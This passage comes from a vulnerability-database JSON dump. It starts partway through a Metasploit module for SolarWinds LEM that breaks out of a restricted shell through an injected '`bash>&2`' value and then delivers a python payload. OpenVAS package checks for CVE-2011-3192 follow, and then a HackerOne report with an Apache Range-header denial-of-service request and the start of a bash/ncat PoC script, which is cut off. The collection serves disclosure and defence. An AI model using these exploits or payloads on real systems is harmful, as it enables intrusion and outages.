end\n\n channel.on_data do |ch, data|\n if data.include? \"cmc \"\n print_good(\"Step 1 is done. Managed to access terminal menu.\")\n channel.send_data(\"service\\n\")\n end\n\n if data.include? \"service \"\n print_good(\"Step 2 is done. Managed to select 'service' sub menu.\")\n channel.send_data(\"restrictssh\\n\")\n end\n\n if data.include? \"Press <enter> to configure restriction on the SSH service to the Manager Appliance\"\n print_good(\"Step 3 is done. Managed to start 'restrictssh' function.\")\n channel.send_data(\"*#`bash>&2`\\n\")\n end\n\n if data.include? \"Are the hosts\"\n print_good(\"Step 4 is done. We are going to try escape from jail shell.\")\n channel.send_data(\"Y\\n\")\n end\n\n if data.include? \"/usr/local/contego\"\n if payload_executed == false\n print_good(\"Sweet..! Escaped from jail.\")\n print_status(\"Delivering payload...\")\n channel.send_data(\"python -c \\\"#{payload.encoded}\\\"\\n\")\n payload_executed = true\n end\n end\n\n end\n end\n begin\n ssh.loop unless session_created?\n rescue Errno::EBADF => e\n elog(e.message)\n end\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/ssh/solarwinds_lem_exec.rb"}], "openvas": [{"lastseen": "2019-05-29T18:36:24", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2011-1245", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122095", "title": "Oracle Linux Local Check: ELSA-2011-1245", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1245.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122095\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1245\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1245 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1245\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1245.html\");\n script_cve_id(\"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:25", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120518", "title": "Amazon Linux Local Check: ALAS-2011-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2011-1.nasl 11703 2018-10-01 08:05:31Z cfischer $\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120518\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 11:27:43 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2011-1\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.A flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. (CVE-2011-3192 )All httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\");\n script_cve_id(\"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:10", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "owncloud.com is vulnerable to Apache range header denial of service. This was confirmed by injecting Range: header payloads and analyzing the request vs. response times to an arbitrary page. The results confirm that processing times took up to 50,000 milliseconds per request when the range header values were specified compared to just 1,000 milliseconds when no range header was specified. This was further confirmed by the Server: header field for owncloud which states the running version of Apache is 2.2.17 which is vulnerable to this attack. \r\n\r\nThis is caused by CVE-2011-3192 which means the server (Apache) is running a vulnerable version of Apache (All versions prior to 2.2.20 are vulnerable). The results could also be further compounded in the case of increased threads per host and by using multiple hosts to attack the website using the same attack. \r\n\r\nSee attached evidence for further proof.\r\n\r\nGET / HTTP/1.1 \r\nHost: owncloud.com \r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \r\nAccept-Language: en-US,en;q=0.5 \r\nAccept-Encoding: gzip, deflate \r\nRange: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-297,5-298,5-299,5-300,5-301,5-302,5-303,5-304,5-305,5-306,5-307,5-308,5-309,5-310,5-311,5-312,5-313,5-314,5-315,5-316,5-317,5-318,5-319,5-320,5-321,5-322,5-323,5-324,5-325,5-326,5-327,5-328,5-329,5-330,5-331,5-332,5-333,5-334,5-335,5-336,5-337,5-338,5-339,5-340,5-341,5-342,5-343,5-344,5-345,5-346,5-347,5-348,5-349,5-350,5-351,5-352,5-353,5-354,5-355,5-356,5-357,5-358,5-359,5-360,5-361,5-362,5-363,5-364,5-365,5-366,5-367,5-368,5-369,5-370,5-371,5-372,5-373,5-374,5-375,5-376,5-377,5-378,5-379,5-380,5-381,5-382,5-383,5-384,5-385,5-386,5-387,5-388,5-389,5-390,5-391,5-392,5-393,5-394,5-395,5-396,5-397,5-398,5-399,5-400,5-401,5-402,5-403,5-404,5-405,5-406,5-407,5-408,5-409,5-410,5-411,5-412,5-413,5-414,5-415,5-416,5-417,5-418,5-419,5-420,5-421,5-422,5-423,5-424,5-425,5-426,5-427,5-428,5-429,5-430,5-431,5-432,5-433,5-434,5-435,5-436,5-437,5-438,5-439,5-440,5-441,5-442,5-443,5-444,5-445,5-446,5-447,5-448,5-449,5-450,5-451,5-452,5-453,5-454,5-455,5-456,5-457,5-458,5-459,5-460,5-461,5-462,5-463,5-464,5-465,5-466,5-467,5-468,5-469,5-470,5-471,5-472,5-473,5-474,5-475,5-476,5-477,5-478,5-479,5-480,5-481,5-482,5-483,5-484,5-485,5-486,5-487,5-488,5-489,5-490,5-491,5-492,5-493,5-494,5-495,5-496,5-497,5-498,5-499,5-500,5-501,5-502,5-503,5-504,5-505,5-506,5-507,5-508,5-509,5-510,5-511,5-512,5-513,5-514,5-515,5-516,5-517,5-518,5-519,5-520,5-521,5-522,5-523,5-524,5-525,5-526,5-527,5-528,5-529,5-530,5-531,5-532,5-533,5-534,5-535,5-536,5-537,5-538,5-539,5-540,5-541,5-542,5-543,5-544,5-545,5-546,5-547,5-548,5-549,5-550,5-551,5-552,5-553,5-554,5-555,5-556,5-557,5-558,5-559,5-560,5-561,5-562,5-563,5-564,5-565,5-566,5-567,5-568,5-569,5-570,5-571,5-572,5-573,5-574,5-575,5-576,5-577,5-578,5-579,5-580,5-581,5-582,5-583,5-584,5-585,5-586,5-587,5-588,5-589,5-590,5-591,5-592,5-593,5-594,5-595,5-596,5-597,5-598,5-599,5-600,5-601,5-602,5-603,5-604,5-605,5-606,5-607,5-608,5-609,5-610,5-611,5-612,5-613,5-614,5-615,5-616,5-617,5-618,5-619,5-620,5-621,5-622,5-623,5-624,5-625,5-626,5-627,5-628,5-629,5-630,5-631,5-632,5-633,5-634,5-635,5-636,5-637,5-638,5-639,5-640,5-641,5-642,5-643,5-644,5-645,5-646,5-647,5-648,5-649,5-650,5-651,5-652,5-653,5-654,5-655,5-656,5-657,5-658,5-659,5-660,5-661,5-662,5-663,5-664,5-665,5-666,5-667,5-668,5-669,5-670,5-671,5-672,5-673,5-674,5-675,5-676,5-677,5-678,5-679,5-680,5-681,5-682,5-683,5-684,5-685,5-686,5-687,5-688,5-689,5-690,5-691,5-692,5-693,5-694,5-695,5-696,5-697,5-698,5-699,5-700,5-701,5-702,5-703,5-704,5-705,5-706,5-707,5-708,5-709,5-710,5-711,5-712,5-713,5-714,5-715,5-716,5-717,5-718,5-719,5-720,5-721,5-722,5-723,5-724,5-725,5-726,5-727,5-728,5-729,5-730,5-731,5-732,5-733,5-734,5-735,5-736,5-737,5-738,5-739,5-740,5-741,5-742,5-743,5-744,5-745,5-746,5-747,5-748,5-749,5-750,5-751,5-752,5-753,5-754,5-755,5-756,5-757,5-758,5-759,5-760,5-761,5-762,5-763,5-764,5-765,5-766,5-767,5-768,5-769,5-770,5-771,5-772,5-773,5-774,5-775,5-776,5-777,5-778,5-779,5-780,5-781,5-782,5-783,5-784,5-785,5-786,5-787,5-788,5-789,5-790,5-791,5-792,5-793,5-794,5-795,5-796,5-797,5-798,5-799,5-800,5-801,5-802,5-803,5-804,5-805,5-806,5-807,5-808,5-809,5-810,5-811,5-812,5-813,5-814,5-815,5-816,5-817,5-818,5-819,5-820,5-821,5-822,5-823,5-824,5-825,5-826,5-827,5-828,5-829,5-830,5-831,5-832,5-833,5-834,5-835,5-836,5-837,5-838,5-839,5-840,5-841,5-842,5-843,5-844,5-845,5-846,5-847,5-848,5-849,5-850,5-851,5-852,5-853,5-854,5-855,5-856,5-857,5-858,5-859,5-860,5-861,5-862,5-863,5-864,5-865,5-866,5-867,5-868,5-869,5-870,5-871,5-872,5-873,5-874,5-875,5-876,5-877,5-878,5-879,5-880,5-881,5-882,5-883,5-884,5-885,5-886,5-887,5-888,5-889,5-890,5-891,5-892,5-893,5-894,5-895,5-896,5-897,5-898,5-899,5-900,5-901,5-902,5-903,5-904,5-905,5-906,5-907,5-908,5-909,5-910,5-911,5-912,5-913,5-914,5-915,5-916,5-917,5-918,5-919,5-920,5-921,5-922,5-923,5-924,5-925,5-926,5-927,5-928,5-929,5-930,5-931,5-932,5-933,5-934,5-935,5-936,5-937,5-938,5-939,5-940,5-941,5-942,5-943,5-944,5-945,5-946,5-947,5-948,5-949,5-950,5-951,5-952,5-953,5-954,5-955,5-956,5-957,5-958,5-959,5-960,5-961,5-962,5-963,5-964,5-965,5-966,5-967,5-968,5-969,5-970,5-971,5-972,5-973,5-974,5-975,5-976,5-977,5-978,5-979,5-980,5-981,5-982,5-983,5-984,5-985,5-986,5-987,5-988,5-989,5-990,5-991,5-992,5-993,5-994,5-995,5-996,5-997,5-998,5-999,5-1000,5-1001,5-1002,5-1003,5-1004,5-1005,5-1006,5-1007,5-1008,5-1009,5-1010,5-1011,5-1012,5-1013,5-1014,5-1015,5-1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299 \r\nConnection: close\r\n\r\n\r\nI also developed the following PoC exploit for this vulnerability:\r\n\r\n#!/bin/bash \r\n# Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield \r\n# CVE: CVE-2011-3192\r\n# Software: Apache <= all versions prior to 2.2.20 and prior to 2.0.65\r\n# Researcher: 1N3 @ https://crowdshield.com \r\n# Date: 8/21/2015 \r\n#\r\n\r\nTARGET=\"$1\"\r\nPORT=\"$2\"\r\nCMD='ncat'\r\n\r\nif [ -z $TARGET ]; then \r\n\techo \"+ -- --=[Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield\" \r\n\techo \"+ -- --=[http://crowdshield.com\" \r\n\techo \"+ -- --=[Usage: ./apache_range_dos <target> <port>\" \r\n\techo \"\" \r\n\texit \r\nfi\r\n\r\necho \"+ -- --=[Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield\" \r\necho \"+ -- --=[http://crowdshield.com\" \r\n\r\nif [ -z $PORT ]; then \r\n\techo \"+ -- --=[Using default port 80/tcp (http)...\"\r\n\tPORT=\"80\" \r\n\tCMD='ncat'\r\nfi\r\n\r\nif [ $PORT -eq \"80\" ]; then \r\n\tPORT=\"80\" \r\n\tCMD='ncat'\r\nfi\r\n\r\nif [ $PORT -eq \"443\" ]; then\r\n\techo \"+ -- --=[Using default SSL port 443/tcp (https)...\"\r\n\tPORT=\"443\"\r\n\tCMD='ncat --ssl'\r\nfi\r\n\r\nBUFFER='Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-297,5-298,5-299,5-300,5-301,5-302,5-303,5-304,5-305,5-306,5-307,5-308,5-309,5-310,5-311,5-312,5-313,5-314,5-315,5-316,5-317,5-318,5-319,5-320,5-321,5-322,5-323,5-324,5-325,5-326,5-327,5-328,5-329,5-330,5-331,5-332,5-333,5-334,5-335,5-336,5-337,5-338,5-339,5-340,5-341,5-342,5-343,5-344,5-345,5-346,5-347,5-348,5-349,5-350,5-351,5-352,5-353,5-354,5-355,5-356,5-357,5-358,5-359,5-360,5-361,5-362,5-363,5-364,5-365,5-366,5-367,5-368,5-369,5-370,5-371,5-372,5-373,5-374,5-375,5-376,5-377,5-378,5-379,5-380,5-381,5-382,5-383,5-384,5-385,5-386,5-387,5-388,5-389,5-390,5-391,5-392,5-393,5-394,5-395,5-396,5-397,5-398,5-399,5-400,5-401,5-402,5-403,5-404,5-405,5-406,5-407,5-408,5-409,5-410,5-411,5-412,5-413,5-414,5-415,5-416,5-417,5-418,5-419,5-420,5-421,5-422,5-423,5-424,5-425,5-426,5-427,5-428,5-429,5-430,5-431,5-432,5-433,5-434,5-435,5-436,5-437,5-438,5-439,5-440,5-441,5-442,5-443,5-444,5-445,5-446,5-447,5-448,5-449,5-450,5-451,5-452,5-453,5-454,5-455,5-456,5-457,5-458,5-459,5-460,5-461,5-462,5-463,5-464,5-465,5-466,5-467,5-468,5-469,5-470,5-471,5-472,5-473,5-474,5-475,5-476,5-477,5-478,5-479,5-480,5-481,5-482,5-483,5-484,5-485,5-486,5-487,5-488,5-489,5-490,5-491,5-492,5-493,5-494,5-495,5-496,5-497,5-498,5-499,5-500,5-501,5-502,5-503,5-504,5-505,5-506,5-507,5-508,5-509,5-510,5-511,5-512,5-513,5-514,5-515,5-516,5-517,5-518,5-519,5-520,5-521,5-522,5-523,5-524,5-525,5-526,5-527,5-528,5-529,5-530,5-531,5-532,5-533,5-534,5-535,5-536,5-537,5-538,5-539,5-540,5-541,5-542,5-543,5-544,5-545,5-546,5-547,5-548,5-549,5-550,5-551,5-552,5-553,5-554,5-555,5-556,5-557,5-558,5-559,5-560,5-561,5-562,5-563,5-564,5-565,5-566,5-567,5-568,5-569,5-570,5-571,5-572,5-573,5-574,5-575,5-576,5-577,5-578,5-579,5-580,5-581,5-582,5-583,5-584,5-585,5-586,5-587,5-588,5-589,5-590,5-591,5-592,5-593,5-594,5-595,5-596,5-597,5-598,5-599,5-600,5-601,5-602,5-603,5-604,5-605,5-606,5-607,5-608,5-609,5-610,5-611,5-612,5-613,5-614,5-615,5-616,5-617,5-618,5-619,5-620,5-621,5-622,5-623,5-624,5-625,5-626,5-627,5-628,5-629,5-630,5-631,5-632,5-633,5-634,5-635,5-636,5-637,5-638,5-639,5-640,5-641,5-642,5-643,5-644,5-645,5-646,5-647,5-648,5-649,5-650,5-651,5-652,5-653,5-654,5-655,5-656,5-657,5-658,5-659,5-660,5-661,5-662,5-663,5-664,5-665,5-666,5-667,5-668,5-669,5-670,5-671,5-672,5-673,5-674,5-675,5-676,5-677,5-678,5-679,5-680,5-681,5-682,5-683,5-684,5-685,5-686,5-687,5-688,5-689,5-690,5-691,5-692,5-693,5-694,5-695,5-696,5-697,5-698,5-699,5-700,5-701,5-702,5-703,5-704,5-705,5-706,5-707,5-708,5-709,5-710,5-711,5-712,5-713,5-714,5-715,5-716,5-717,5-718,5-719,5-720,5-721,5-722,5-723,5-724,5-725,5-726,5-727,5-728,5-729,5-730,5-731,5-732,5-733,5-734,5-735,5-736,5-737,5-738,5-739,5-740,5-741,5-742,5-743,5-744,5-745,5-746,5-747,5-748,5-749,5-750,5-751,5-752,5-753,5-754,5-755,5-756,5-757,5-758,5-759,5-760,5-761,5-762